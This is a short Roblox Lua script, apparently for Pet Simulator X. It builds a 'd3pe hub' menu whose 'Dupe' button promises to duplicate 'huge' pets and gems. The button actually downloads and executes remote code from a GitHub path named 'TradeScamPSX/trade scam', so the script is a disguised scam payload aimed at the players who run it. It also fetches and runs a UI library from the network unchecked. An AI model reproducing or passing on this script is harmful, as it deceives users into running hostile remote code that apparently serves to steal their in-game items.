local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/xHeptc/Kavo-UI-Library/main/source.lua"))() local Window = Library.CreateLib("d3pe hub", "Ocean") -- MAIN local Main = Window:NewTab("Main") local MainSection = Main:NewSection("Main") MainSection:NewButton("Dupe", "Makes you dupe all huge and gems", function() loadstring(game:HttpGet('https://raw.githubusercontent.com/leotovalid/TradeScamPSX/main/trade%20scam'))() end)